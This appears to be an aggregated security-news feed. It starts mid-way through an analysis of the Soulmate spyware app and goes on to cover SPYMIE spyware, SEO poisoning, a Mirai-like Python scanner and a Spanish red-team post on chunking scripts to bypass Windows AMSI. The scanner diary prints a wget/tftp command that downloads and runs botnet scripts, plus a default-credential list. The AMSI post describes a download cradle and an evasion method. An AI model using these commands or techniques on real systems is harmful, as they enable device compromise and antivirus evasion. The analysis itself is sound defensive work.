interaction, and the Android BroadcastReceiver is a component that can be made to trigger when certain system events occur, such as presenting an alert when the battery is low. This spyware registers a broadcast receiver named ReciverHandler. This receiver is registered to execute upon following events:  Outgoing Call Connectivity Change Change of Phone State Package Added/Removed/Installed  Power Disconnect/Connect SMS Received SMS Sent Boot Screen ON/OFF Depending upon which of the above events occurs, the spyware is designed to trigger particular services. We found that this app used the following Android services:  Call Record Service Record Service Geofence Service App location Service MyKeyboard Service Clipboard Monitor Service Basic Info Upload Service File Upload Service  Upload Service  Call Record Service and Record Service are responsible for recording the victim’s calls. The screenshot below shows this functionality.   Fig 4:  Call recording   Geofence Service and AppLocation Service are responsible for fetching the victim's location. A snippet from the service can be seen below:   Fig 5: Location tracing   Clipboard Service is responsible for stealing everything that is copied/pasted by the victim. The app creates a file named clipboard.txt in which the app stores all copied data. Copied data is also uploaded to the server, as shown in the following screenshot.   Fig 6: Clipboard service    The app also tries to steal the victim's SMS messages as shown below:    Fig 7: SMS stealing   Once every detail is collected, the data is saved in database locally and then sent to the C&C. These functions are achieved with the BasicInfoUpload Service, FileUpload Service, and Upload Service.  As we researched package names, app certificates, and statically collected data, we discovered that this spyware had been uploaded to Google Play in past with the name Soulmate (Beta) and a different package name (com.perfekt.ats.perfektsoulemates). It was taken down immediately. We also came across a lot of advertising for spyware apps that enable users to spy on loved ones. Some of these ads are shown below.   Fig 8: Spyware advertisements   These advertisements took us to the developer's official website, apps[.]kikde[.]com. KikDe  promotes itself as a company that provides services to develop websites, Android apps, iOS apps, Windows apps, SEO (Search Engine Optimization), and more. On the KikDe website, we found references to another company called American Transportation System LLC. Tracing this company, we ended up on a third-party website that was still hosting some of its apps. All these apps contained the word  “perfekt” in their titles and it soon became clear that the earlier app named Soulmate was uploaded by this same entity. Other apps by this developer can be seen in the screenshot below along with comparisons to the same apps with different names on Google Play:    Fig 9: Third-party vs. Google Play apps   Other apps from this developer were also highly suspicious. For example, Kikde OTP Monitor could be used for forwarding an OTP (One Time Password) to another mobile device. Kikde Secure+ Keyboard was more of a keylogger. We are continuing our analysis of these apps and will report our findings.    Conclusion  It is always advisable to stay away from “spying” apps. They do have some legitimate use cases, such as parents keeping track of the whereabouts of their children. But as we’ve seen with Soulmate, users can’t be sure of what is happening under the hood, and the user who is spying may actually be the one who is spied upon. When considering apps to download, users should always exercise caution. Some apps might have good ratings and favorable reviews, but that is not reason enough to trust them, because such ratings and reviews can easily be supplied by the attackers themselves using other identities.  Zscaler protects users from spyware and other malicious apps that call out to C&C servers.
Categories: Security Posts

Ubiquitous SEO Poisoning URLs

Zscaler Research - 9 min 32 sec ago
SEO poisoning, also known as search engine poisoning, is an attack method that involves creating web pages packed with trending keywords in an effort to trick search engines to get a higher ranking in search results. There are different ways to implement SEO poisoning, such as keyword stuffing, the use of hidden text, and cloaking, among others. In addition to manipulating search ranking, SEO poisoning is widely used to redirect users to unwanted applications, phishing, exploit kits and malware, porn, advertisements, and so on.  The ThreatLabZ research team has been actively tracking SEO poisoning campaigns; in this blog, we will share some recent examples and an analysis of the techniques used.  “Midterm elections” campaign Attackers often use holidays and other timely occasions that are likely to generate a lot of search interest. For this analysis, we chose to focus on the upcoming U.S. election. In the following screenshot, there are three SEO poisoned URLs in the Google search result for the keyword “midterm elections.”  Fig. 1: SEO poisoned URLs in Google search   After about a month of looking at this “midterm elections” SEO poisoning campaign, we found more than 10,000 compromised websites with more than 15,000 keywords, and we continue to find hundreds of newly compromised sites involved in this activity every day. Use of multiple redirects Let’s take a look at some specific URLs generated by the following SEO poisoning campaign: websitedukkani[.]com/enj0qnh/godev3a.php?snlhpyouf=midterm-elections-2018-polls The Google cache for the above URL is shown below, and you can see that the Google crawler got a junk page loaded up with many uses of the keyword “midterm elections.”  Fig. 2: Google crawler loaded with keywords But as we browse this URL in Chrome, we discovered that it may be redirected to this page: Figure 3: SEO poisoning landing page example We say “may” because the redirected website is different each time. We also noted that it goes through a series of redirects before landing on the final page, as shown in figure 4 below. This is just one of the many measures that cybercriminals are using to deter automated crawlers from adding detection for the landing pages. In our example, the user goes through two redirects via the “302 Found” response code before getting to a real page, as shown in figure 3: Redirect URL #1 - 5[.]45[.]79[.]15/input/?mark=20180314-landlordpeace.com/0fuq&tpl=9&engkey=how+to+login+to+zscaler   Redirect URL #2 - www[.]hitcpm[.]com/watch?key=027ed88f05536b6c1a41df968c0abb52 Figure 4: The web page content of the last redirect The final landing page that the user sees will be different every time; in our case the user was served the following web page: best2017games[.]com/bestgames/playtime/6a6d637637c06de629eb725d6c5c34e1/index.php?country_code=US&p1=http%3A%2F%2Fadsfxs.pro%2Fclick%2F05e45367-502f-4558-8e24-9235a5169358%3Fclickid%3DVjN8MTQyNjk4NDh8MTE0NTYyNXwxNTQ2MzZ8MTUyMTA2NzI3M3wyN2RkMDE5MS0xMThjLTRhNWItYjJiYy1mYWI0Nzk2ZTRjMzJ8NzEuMTk3LjIzMS45NXwzfDIwZTdkNzQ3Mzk3MmU5MTllZDQ2NDY0NTI3ZmE0OTcz%26zoneid%3D14269848 The multiple redirect model provides a perfect platform for a MaaS (Malware-as-a-Service) infrastructure, as it shields the final landing page from automated security crawlers. Cloaking technique The attackers are leveraging cloaking techniques whereby the end user is served different content depending on the HTTP headers involved in the web request. We noticed three distinct responses in some of the recent campaigns:   Crawler view: The SEO URL will return a web response that is more catered towards poisoning the search engine results for the relevant search term. This will make the URL appear higher in the search result. Browser or user view: The SEO URL in this case will lead the user through a series of redirects before a final landing page, dependent upon the campaign. The attacker distinguishes between user view and crawler view by inspecting the user-agent HTTP header of the request. If the user-agent string belongs to a well-known web browser, then user view content is served.   Referer view: The SEO URL in this case will serve different content to the end user, depending on the URL set in the referer HTTP header. Without cloaking Without the use of cloaking, the content fetched by the search engine crawler “crawler view” as well as the direct user “direct view” will be identical. However, the SEO page will have scripts to detect whether it is an actual user loading the content in a web browser, in which case the user will be redirected to the final landing page containing the malicious content. Here is an example of an SEO campaign where cloaking is not being used: URL:  tucuerposiente[.]cl/forum/070sxjj.php?bbhb=excel-vba-cells-function The crawler view and direct view for this SEO URL returns identical content. The SEO page in this case will redirect to a final landing page based on the user’s action, such as mouse movement or rendering of the page in the web browser. The crawler will not see the landing page redirect, as there is usually no user interaction or browser rendering involved. Below is a view of what happens when a user browses an SEO-poisoned URL that is not leveraging cloaking techniques. The user will see a webpage as well as a busy icon on the browser tab indicating additional background activity. This activity is leading the user to the final landing page in the background as shown in this screen capture from Fiddler (a free web request debugging tool). Figure 5: An SEO poisoned URL without cloaking leads user to landing page The attacker is leveraging specially crafted CSS (Cascading Style Sheet) to perform a redirect from the user’s browser. In CSS, the URL property can be used to set the background. The figure below shows the typical usage of the URL property (taken from w3schools.com). Figure 6: URL property But, if you don’t give any parameter to the URL property, like url() instead of url(“URL”),  it will load the parent page again. During the second loading, however, the referer HTTP header is set to the parent URL itself. This is the reason there are two requests to the same URL in Fiddler. It is important to note that the malicious content will be served on the second request, in which the referer HTTP header is set to the expected URL. The figure below shows the CSS code snippet used in the SEO page. The line “background-image: url()” will cause the page to reload. Figure 7: CSS code snippet in the SEO page The second request will load the malicious code, as shown in the image below. Figure 8: Malicious code SEO URL generation Let’s take a look at a typical SEO URL structure seen in SEO poisoning campaigns: SEO URL:  sbtechsiteleri[.]com/docs/bmfns7.php?gneo=access-vba-form-load We can divide this URL into several parts: Host:                           www.sbtechsiteleri[.]com URI path:                    docs PHP page file: bmfns7.php Parameter:                 gneo Search keywords:      access-vba-form-load The campaign uses different parameters to generate URLs. We have found hundreds of unique parameters; jtjd and wanh are two examples of parameters shown in the screenshot below. From the search result in the screenshot, we can reasonably guess there are hundreds of millions of SEO URLs generated for these two parameters.  Figure 9: URLs generated  SEO web page generation Although we don’t have access to the backend code used to generate the SEO webpages, we can draw some insights into the generation process based on our analysis of several pages involved in this activity: Pick up the keywords from the “search keywords”; search in search engine Collect the responses that contain the keywords  Generate a final response containing specific strings from the collected responses The Google cache of the webpage www.sbtechsiteleri[.]com/docs/bmfns7.php?gneo=access-vba-form-load:  Figure 10: Example of Google cache  The first sentence, “I am fairly new to Access,” can be found in several URLs. The second sentence, “Programming Microsoft Access with VBA can be a lot easier if you know the keyboard shortcuts for the most common commands and tasks and the” is from this site: Figure 11: Example of site found  Following that sentence, you can see, “If you want to set the RecordSource of another form, you must ensure the other form is open first,” which is from this website: Figure 12: Example of sentence found at site All three of the above examples are for the keyword “access.” Conclusion SEO URLs redirect users to different targets. We saw two modes of operation in the pages that we analyzed:   The users go through a series of redirects to reach the final landing page. The users are redirected to a MaaS (Malware-as-a-Service) platform which starts another redirection chain leading to final landing page.   Here are the top web categories to which the final landing page sites belonged: 1. Adult and pornographic websites 2. Internet services sites; in this case, the SEO campaign's purpose is advertising 3. Politics and religion, an example of which is shown below 4. Exploit servers leading to adware/malware payloads On an average, we see over 3,000 new and unique SEO poisoned URLs every day. ThreatLabZ is actively tracking this threat and will continue to ensure coverage for Zscaler customers. Indicators of Compromise The  list of the redirectors used by this campaign and some IOCs for PHP files and ZIP files can be found here. If you find these PHP or ZIP files in your website, it is likely that your website has been compromised.
Categories: Security Posts

Why you shouldn't trust "safe" spying apps!

Zscaler Research - 9 min 32 sec ago
During a recent malware hunt, the ZscalerTM ThreatLabZ research team came across a suspicious Android app on Google Play, the official Google app store, named SPYMIE. SPYMIE portrays itself as an Android-based key logger designed for parents to track the cell phone activities of their children. Given the popularity of such apps, it has become common practice for app creators to promote spying capabilities as parental control features. However, SPYMIE packs a little something extra with the parental controls.  Basically, SPYMIE is an Android-based keylogger that has ability to hide itself and start recording everything the user tries to access. Ideally, keystroke logging is best achieved with keyboard-based apps, but this app uses Android's Accessibility Services to perform its functions. The app author also has included their email address in the code of the app, which allows them to receive all the information that the app is collecting, making those using the app vulnerable to having their personal information stolen.  Before the app was removed from Google Play, its description was as follows: “SPYMIE: Key logger is specially designed for parents to track the cell phones of your children. It will also help you when someone friends ask you for your phone for ten minutes but you don’t trust on it. So what you have to do you only have to on the SPYMIE: Key Logger. So whenever the friends return phone to you, you can check all the activities done by your friend. It records all the activities that are done on your phone. All activates are send to your mobile phone via email.  "For parents what they have to do, you just install the app in your children phone. Hide the icon. Later on you have check all the activities done by your children in the whole day." Zscaler notified Google about the presence of this app and it was immediately removed from Google Play.   App Details Name : SPYMIE: Key Logger Package Name : com.ant.spymie.keylogger Hash : 8e32ce220e39ba392c9e15671a32854b Size : 5.5M Installs : 10,000+   Technical Details   As soon as the app is installed, it splashes basic setup activities asking the user for email ID, as shown in screenshot below.    Fig. 1: SPYMIE initial activities   Once the introduction is complete, the app asks for runtime permission for managing outgoing calls. The reason for asking this permission is related to the app's hiding functionality. As shown in screenshot below, if the user enables the hiding feature, the app then asks for a secret PIN to open the app. The user can then open the app by firing up the phone dialer and entering the PIN. This is the main reason for asking permission related to phone calls.   Fig. 2: Hiding functionality    After further analysis, we found that the app contains a default PIN as well. Dialing **00## would open this keylogger app. The screenshot below shows the code snippet for this functionality.    Fig. 3: Default hard-coded PIN   Once the basic setup is done, one can turn on the spying feature. For enabling spying on a user's activities, this app uses Accessibility Services. This feature was designed to assist users with disabilities in using Android devices and apps. The below screenshot displays functionality in action:    Fig. 4: Enabling Accessibility Services   Once Accessibility Services is enabled, the app starts logging every activity performed by the user/victim. The snapshot below shows the code responsible for logging user actions along with keystrokes and storing it in a file named SpyLogger.xml.    Fig. 5: Storing user/victim's activities    In order to see the functionality in action, we tried running the app in a controlled environment. At first, we opened Gmail and tried composing a sample email. As shown in the screenshot below, almost every activity, from opening the Gmail app (left side) to composing the body of the email, was logged (right side).    Fig. 6: Gmail logging     In another test, we fired up Paytm and tried logging in. The right side of the screenshot below shows how every action was logged.    Fig. 7: Paytm login   The above screenshots display the logs visible in Android's logcat command, but behind the scenes, all this data is being written in a file named SpyLogger.xml.   Looking from another perspective, the app has a serious vulnerability which, according to OWASP, can be categorized into Insecure Data Storage. Any random app with READ_LOGS permission can read logs presented by Android. In this scenario, all sensitive data is being written to log entries and every piece of sensitive data is at risk.  Additionally, this keylogger app can send logged/stolen data to the email ID input by the user during setup, but we found a code snippet that was designed to send this data to another hard-coded email ID as well. The screenshot below shows both the code snippets. The first one is the ideal scenario, in which email is sent to the provided email ID, and the second box shows the app's functionality, in which a timer task is run to send email to the hard-coded email ID every 60 seconds.    Fig. 8: Sending stolen data to different email IDs   During our analysis, we did not find any calls made to the second code snippet, where email is sent to the hard-coded email ID, and we believe there are two possible explanations. It is possible that the app's author added this functionality while testing and forgot to remove the dead code. This seems unlikely, because the code snippet to send email to the hard-coded email ID is well designed and placed as a timer task to send email every 60 seconds. The second possibility could be related to the app being "under-construction." This app might still be in development and any calls related to this function may be added in future updates.  Conclusion  We believe there are two likely scenarios in which key logging apps, like SPYMIE, may be used. 1. Parents installing spying apps on their children's devices     - Parents can install such apps in order to track their children's online activities 2. Users willingly install such an app to steal someone else's data.     - Any user can install such apps on their Android devices and might offer their phone to others for use. When a victim enters his/her personal details, it will be logged. User can view this information at a later time. It is always advisable to stay away from spying apps, because a typical user can never be sure of what exactly is happening under the hood. Be cautious if using mobile devices other than your own. Never perform critical actions or enter personal information on borrowed or unknown devices. Zscaler users are safe from such type of threats. ZscalerTM Sandbox detected the app accurately as shown in screenshot below:  Fig. 9: Zscaler Cloud Sandbox detection  
Categories: Security Posts

Infocon: green

Mirai-alike Python Scanner
Categories: Security Posts

Google’s Waze Can Allow Hackers to Identify and Track Users

Threatpost - 1 hour 7 min ago
The company already patched an API flaw that allowed a security researcher to use the app to find the real identity of drivers using it.
Categories: Security Posts

[SANS ISC] Mirai-alike Python Scanner

/dev/random - 1 hour 45 min ago
I published the following diary on isc.sans.edu: “Mirai-alike Python Scanner“: Last week, I found an interesting Python script that behaves like a Mirai bot. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials. The script has been uploaded to VT and has a low score of 2/59. Indeed, it does not contain suspicious strings nor API calls. Just a simple but powerful scanner. Here are the commands injected when a device is found with vulnerable credentials… [Read more] The post [SANS ISC] Mirai-alike Python Scanner appeared first on /dev/random.
Categories: Security Posts

Ransomware gang donates part of ransom demands to charity organizations

Zero Day | ZDNet RSS Feed - 2 hours 26 min ago
The Darkside ransomware gang has donated $10K it received as part of ransom demands to Children International and The Water Project.
Categories: Security Posts

Mirai-alike Python Scanner, (Tue, Oct 20th)

Last week, I found an interesting Python script that behaves like a Mirai bot[1]. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials. The script has been uploaded to VT and has a low score of 2/59[2]. Indeed, it does not contain suspicious strings nor API calls. Just a simple but powerful scanner. Here are the commands injected when a device is found with vulnerable credentials: rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.148.10.84/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.148.10.84 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.148.10.84; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.148.10.84 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh" #command to send The IP address %%ip:45.148.10.84%% is offline at the moment but has already a bad reputation and is present in multiple blocklists. Here is the list of credential pairs tested: combo = [ "root:root", "root:", "admin:admin", "telnet:telnet", "support:support", "user:user", "admin:", "admin:password", "root:vizxv", "root:admin", "root:xc3511", "root:888888", "root:xmhdipc", "root:default", "root:juantech", "root:123456", "root:54321", "root:12345", "root:pass", "ubnt:ubnt", "root:klv1234", "root:Zte521", "root:hi3518", "root:jvbzd", "root:anko", "root:zlxx.", "root:7ujMko0vizxv", "root:7ujMko0admin", "root:system", "root:ikwb", "root:dreambox", "root:user", "root:realtek", "root:00000000", "admin:1111111", "admin:1234", "admin:12345", "admin:54321", "admin:123456", "admin:7ujMko0admin", "admin:1234", "admin:pass", "admin:meinsm", "admin:admin1234", "root:1111", "admin:smcadmin", "admin:1111", "root:666666", "root:password", "root:1234", "root:klv123", "Administrator:admin", "service:service", "supervisor:supervisor", "guest:guest", "guest:12345", "guest:12345", "admin1:password", "administrator:1234", "666666:666666", "888888:888888", "tech:tech", "mother:fucker" ] The script is pretty well written and is multi-threaded to speed up the scan: for l in xrange(threads): try: t = threading.Thread(target=worker) t.start() except: pass The script does not implement a random IP address generator, it just uses the zmap[3] scanner: zmap -p23 -N 10000 -f saddr -q --verbosity=0 This command will return 10000 IP addresses that expose a telnet port.  The question that arises when you find this kind of script is: "Can we really find so many devices exposing a telnet interface into the wild in 2020?". I did my own test and launched the above zmap command. In a few seconds, 10K IP addresses were returned. Then, I used the nmap scanner with the 'banner' script to grab telnet banners: nmap -sC --script=banner -p 23 -Pn -iL open-telnet.txt -oA telnet-banners -v -n I found a lot of banners that disclose the type of devices (routers, WiFi access points, switches, VoIP gateways, IoT, ...). More interesting, a found some devices still bricked by the BrickerBot: # telnet x.x.x.x Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. Internet Chemotherapy Part 11 - BrickerBot (TM) Source Drop (7/31 2020): hxxp://depastedihrn3jtw[.]onion/show.php?md5=20735856837081a18e6f0edf2c1e8d76 Internet Chemotherapy Part 12 - Third Time is the Charm? (9/6 2020) hxxp://depastedihrn3jtw[.]onion/show.php?md5=4c17df6b30ed2704082465d9a1c4ea86 DeepPaste is temperamental (unreachable 75% of time) so if the links are not loading then try again later. Update 10/3: So I have been looking into reconditioning Tenda/Intelbras, Genexis and Zte routers.. Still WIP but seen some positive impact over the last few days/weeks. Update 10/6: ..and Totolink.. 10/9: some new tricks for netis, TVT and Tata Consulting.. what next? Update 10/17: Getting in the Zhone.. seeing real IoT action in 2020 at last (none) login: I found plenty of notifications and disclaimers warning you that connecting to the device is prohibited, your IP will be logged, etc. Please, don't waste your time to implement such unuseful banners, just get rid of telnet! [1] https://www.cyber.nj.gov/threat-center/threat-profiles/botnet-variants/mirai-botnet
[2] https://www.virustotal.com/gui/file/89daf232e0658103883fa05b8968093675b5aa4b6be3fdbd46757144095daf64/details
[3] https://github.com/zmap/zmap Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Hacking Windows10: Troceando scripts para lograr el bypass de AMSI

Un informático en el lado del mal - 6 hours 55 min ago
Desde hace ya tiempo hemos trabajado con el sistema AMSI (Anti Malware Scan Interface) de Windows 10 para entenderlo, conocerlo y en lo que podamos, mejorar su funcionamiento descubriendo sus límites. Desde luego que es una protección más que interesante y que permite detectar ciertas instrucciones maliciosas en lenguajes de scripting como Javascript, Powershell o VBS antes de que sean ejecutadas. Es una forma de llegar donde el antivirus (AV) no puede llegar o, mejor dicho, de enterarse lo que pasa en un proceso cuando el AV no puede enterarse “per se”.

Figura 1: Hacking Windows10: Troceando scripts para lograr el bypass de AMSI
En Ideas Locas hemos llevado a cabo la creación de la herramienta ATTPwn, de la que ayer os contábamos las novedades de la nueva versión, y en la que pusimos mucho “cariño”. Esta herramienta de emulación de amenazas nos ha permitido enfrentarnos con el juego del gato y del ratón que presenta AMSI, como cualquier otra protección. Ya hemos hablado en el blog de estas cosas como, por ejemplo, con el artículo de ofuscación, bypass manual y AMSI.fail.

Figura 2: ATTPwn en GitHub
Trabajando últimamente con ATTPwn y mostrándolo en diversas conferencias nos hemos dado cuenta de la rapidez con la que AMSI ayuda a detectar ATTPwn o la consola que es el código de inicio en Powershell. Si estudiamos a Metasploit y el módulo web_delivery con su opción de Powershell podemos ver que, en las nuevas versiones, se ejecuta primero un bypass para AMSI, si estás en Windows 10, y posteriormente se ejecuta el Meterpreter o payload que hayas configurado.

Figura 3: Metasploit para Pentesters Gold Edition
Esto no es más que un ejemplo de la necesidad hoy en día de conocer las posibilidades de bypassear un AMSI en un Ethical Hacking y, lo más importante, ser capaces de modificar cualquier tipo de script que haga un bypass de AMSI para que, una vez detectado, podamos hacerlo de nuevo “indetectable”. De esto vamos a hablar en este artículo.

Cuando tu código de Powershell orientado a Pentesting es detectado

Cuando un código que hacía algo importante para tu Ethical Hacking es detectado por un AV, gracias a la implementación en ese proceso de AMSI, es un “problema”. ¿Qué podemos revisar? Sabemos que si ofuscamos el código puede que el AV no lo detecte como malicioso, pero ¿tengo más opciones? Sí. En la imagen se puede ver la consola de ATTPwn siendo detectada por AMSI.

Figura 4: Consola de ATTPwn detectada por AMSI 
Podemos abrir un ISE Powershell y comprobar paso a paso qué es lo que funciona y qué es lo que es detectado. Esto nos permite tener una primera visión del problema. Es una forma de aislar y acotar el problema. Pensemos que si tengo un script de 10 líneas y lo ejecuto sin más y es detectado, tengo que dividir el problema. Recuerda “divide y vencerás”. Mi script de 10 líneas puede ejecutarse en una Powershell de 2 líneas en 2 líneas. Si ejecuto las 2 primeras líneas y todo va bien, significa que AMSI no se “queja”. Podemos reducir el problema a:

1. Ejecuta 2 primeras líneas de mi script 10 de líneas.2. Si todo va bien, ejecuto las siguientes 2. 3. Si todo va bien… así hasta llegar a las 10 líneas de mi script.4. Si no se ha quejado y la funcionalidad se ha acabado ejecutando significa que puedo operar “troceando” la función o el script. Sin necesidad de ofuscar.
Si lo llevamos al plano de bypass de AMSI, nosotros nos encontramos con el problema de que la consola de ATTPwn era detectada y el usuario puede entender que la aplicación no funciona. No es cierto, es algo con lo que uno se debe enfrentar y dar solución. El usuario puede modificar el cómo se ejecuta dicho código, ofuscarlo, modificarlo, hacer lo que sea para evitar la protección. 
Figura 5: Libro de Pentesting con PowerShell 2ª Edición
Una estrategia para solventar el problema, que puede que en el futuro lo vuelvan a detectar, es la de trocear el bypass de AMSI de rasta-mouse, el cual está en ibombshell y en ATTPwn. El objetivo es evitar que esta función sea detectada por AMSI y ejecutarla. Posteriormente ejecutaríamos ATTPwn sobre un proceso sin AMSI, ¿Cómo lo haremos? Lo veremos un poco más adelante.

Figura 6: Deshabilitar envío de muestras en MS Windows Defender 
Una recomendación cuando se está “jugando” con todo esto es tener la máquina virtual sin conexión a Internet si no queremos que se actualicen las firmas y/o deshabilitar la subida de las muestras. Esto se puede hacer desde Windows Defender de forma sencilla, aunque si la máquina no tiene conexión a Internet nos valdría.

Utilizando un bypass “Classic” más lo que hemos aprendido

Ahora, vamos a ver cómo troceamos el script para que podamos hacer el bypass de AMSI y nuestra consola de ATTPwn no sea “cazada” como maliciosa. Antes de nada, hay que pensar en, si podríamos hacerlo con un bypass de “classic”. Es cierto que modificando la línea ‘iex(new-object net.webclient).downloadstring(‘[URL consola]’) y metiendo alguna concatenación de strings se puede lograr, si la detección está basada en la firma de la URL. En el caso de que sea por contenido de la función consola, así no lo lograremos.

Figura 7: Parte 1 del script
La mentalidad de la estrategia es “una vez ejecutado algo, ya está ejecutado, sigamos leyendo”. Esto quiere decir que, basándonos en el apartado anterior, podemos trocear la función de bypass de AMSI de rasta-mouse e invocarla lo primero. Una vez ejecutada, podremos ejecutar la consola sin problema. Vamos a ello.

Figura 8: Parte 2 del script
Lo primero es ver que tenemos 5 ficheros *.ps1 . En cada fichero tenemos un trozo de función de bypass de AMSI. El tercer fichero el código “troceado” lo puedes ver aquí.

Figura 9: Parte 3 del script
Ahora viene un problema con el que nos enfrentamos. Quisimos dividir de menos, es decir, en el fichero 4 queríamos terminar el bypass de AMSI y ejecutar la consola de ATTPwn. ¿Qué ocurrió? 

Figura 10: Intentando abrir la consola en la parte 4 del script 
En la Figura 10 puedes ver el código que hicimos, pero si probamos a ejecutar los scripts, veremos que el truco aquí no funcionará, tal como se ve en la imagen siguiente.

Figura 11: Fallo en la ejecución de la parte 4 
Era demasiado pronto, ya que la instrucción de descarga de la consola se detectaba como malicioso. Quizá con una concatenación de strings en la URL se arregle, pero mejor no dividir de menos.

Figura 12: Parte 4 del script, correcta. 
Así quedaría el fichero 4.ps1 y el fichero 5.ps1. Cada uno en su parcela para ver si podemos saltarnos el AMSI con este troceado.

Figura 13: Parte 5 del script 
La idea es ir ejecutando cada uno por separado, de modo que AMSI solo evaluará los ficheros que correspondan. Recordando lo de “una vez ejecutado, ejecutado queda” pues si el fichero 1.ps1 es evaluado como no malicioso y ejecutamos ese trozo, digamos que el AV no tiene memoria de lo que has ejecutado previamente. 
Figura 14: Ejecución de la función byp4ss
En ATTPwn hay una función que te devuelve una función, la que le pidas, para ser ejecutada. Esta función es “givemefunction”. De esta forma, directamente, se puede pedir una función y ser ejecutada antes de empezar con el flujo normal de una consola de ATTPwn que pide un plan de amenaza a emular. Recapitulando tenemos:

- 5 “snippets” de código que sumados ejecutan el bypass de AMSI - Un fichero llamado byp4ss que almacena la llamada iex(new-object net'.'webclient).downloadstring([URL]) a cada “snippet” de código.  - El 5 fragmento de código es el de la llamada a la consola de ATTPwn.  - Los 4 primeros fragmentos se irán ejecutando y la suma es el bypass de AMSI.
Cabe destacar que tanto la llamada de la función byp4ss como las realizadas dentro de ella, hasta lograr el bypass de AMSI, son realizadas con una ofuscación mínima pero necesaria para hacer posible la ejecución de dicho bypass. Se puede ver en el entrecomillado del punto en iex(new-object net'.'webclient).downloadstring([URL])

Figura 15: Resultados sin y con una ofuscación mínima para lanzar el bypass
Es una técnica que podréis utilizar en diversos Ethical Hacking o ejercicios de Red Team ya que los resultados son bastante buenos. Otra vía, como se ha dicho en este artículo es ir por la ofuscación. Es otra opción. Sea como sea, ya tienes disponible en la última versión de ATTPwn, la 0.2.1, la posibilidad de crear el código de warrior de esta forma, para “asegurarte” el bypass de AMSI en un entorno Windows 10, Windows Server 2016/2019
Saludos,  

Autores:
Luis E. Álvarezdesarrollador y miembro del equipo Ideas Locas CDCO de Telefónica.
Figura 16: Contactar con Luis Eduardo Álvarez en MyPublicInbox
Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advanced Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root",  “Pentesting con Powershell”, "Pentesting con Kali Silver Edition" y de "Empire: Hacking Avanzado en el Red Team", Microsoft MVP en Seguridad y Security Researcher en el equipo de "Ideas Locas" de la unidad CDCO de Telefónica.  Para consultas puedes usar el Buzón Público para contactar con Pablo González - Conseguir 100 Tempos Gratis en MyPublicInbox
Figura 17: Contactar con Pablo González
Sigue Un informático en el lado del mal RSS 0xWord
Categories: Security Posts

ISC Stormcast For Tuesday, October 20th 2020 https://isc.sans.edu/podcastdetail.html?id=7216, (Tue, Oct 20th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

UK says Russia was preparing cyber-attacks against the Tokyo Olympics

Zero Day | ZDNet RSS Feed - 12 hours 28 min ago
Targets included the Games' organizers, logistics services, and sponsors, UK officials said.
Categories: Security Posts

What DoH Can Really Do

Webroot - Mon, 2020/10/19 - 22:15
Reading Time: ~ 3 min. Fine-tuning privacy for any preference A DNS filtering service that accommodates DNS over HTTPS (DoH) can strengthen an organization’s ability to control network traffic and turn away threats. DoH can offer businesses far greater control and flexibility over their privacy than the old system. The most visible use of DNS is typically the browser, which is why all the usual suspects are leading the charge in terms of DoH adoption. This movement has considerable steam behind it and has extended beyond just applications as Microsoft, Apple and Google have all announced their intent to support DoH. Encrypting DNS requests is an indisputable win for privacy-minded consumers looking to prevent their ISPs from snooping on and monetizing their browsing habits. Businesses, on the other hand, should not easily surrender this visibility since managing these requests adds value, helping to keep users from navigating to sites known to host malware and other threats. Here are three examples of how. 1.  By enhancing DNS logging control Businesses have varying motivations for tracking online behavior. For persistently troublesome users—those who continuously navigate to risky sites—it’s beneficial to exert some control over their network use or even provide some training on what it takes to stay safe online. It can also be useful in times of problematic productivity dips by helping to tell if users are spending inordinate amounts of time on social media, say. On the other hand, for CEOs and other strategic business units, tracking online activity can be cause for privacy concerns. Too much detail into the network traffic of a unit tasked with investigating mergers and acquisitions may be unwanted, for example. “If I’m the CEO of a company, I don’t want people paying attention to where I go on the internet,” says Webroot DNS expert Jonathan Barnett. “I don’t want people to know of potential deals I’m investigating before they become public.” Logging too much user information can also be problematic from a data privacy perspective. Collecting or storing this information in areas with stricter laws, as in the European Union, can unnecessarily burden organizations with red tape. “Essentially it exposes businesses to requirements concerning how they’re going to use that data, who has access to it and how long that data is preserved” says Barnett. By optionally never logging user information and backing off DNS logging except when a request is deemed a security threat, companies maintain both privacy and security. 2. By allowing devices to echo locally With DoH, visibility of DNS requests is challenging. The cumulative DNS requests made on a network help to enhance its security as tools such as SIEMs and firewalls leverage these requests by controlling access as well as corelating the requests with other logs and occurrences on the network.  “Let’s say I’m on my network at the office and I make a DNS request,” explains Barnett. “I may want my DNS request to be seen by the network as well as fielded by my DNS filtering service. The network gets value out of DNS. If I see inappropriate DNS requests I can go and address the user or fix the device.” Continuing to expose these DNS requests through an echo to the local network provides this, while the actual requests are secure and encrypted by the DNS protection agent using DoH. This option achieves the best of both worlds by adding the security of DoH to the security of the local network. 3. By allowing agents to fail open DNS is instrumental to the functionality of the internet. So, the question is, what do we do when a filtered answer is not available? By failing over to the local network, it’s assured that the internet continues to function. However, there are times when filtering and privacy are more important than connectivity. Being able to choose if DNS requests can leak out to the local network helps you stay in control by choosing which is a priority.  “Fail open functionality essentially allows admins to make a tradeoff between the protection offered by DNS filtering and the productivity hit that inevitably accompanies a lack of internet access,” says Barnett. Privacy your way The encryption of DoH enables options for fine-tuning privacy preferences while preserving the security benefits of DNS filtering. Those that must comply with the needs of privacy-centric users now have control over what is revealed and what is logged, while maintaining the benefits of communicating using DoH. Click here to read related blogs covering the transition to DNS over HTTPS. The post What DoH Can Really Do appeared first on Webroot Blog.
Categories: Security Posts

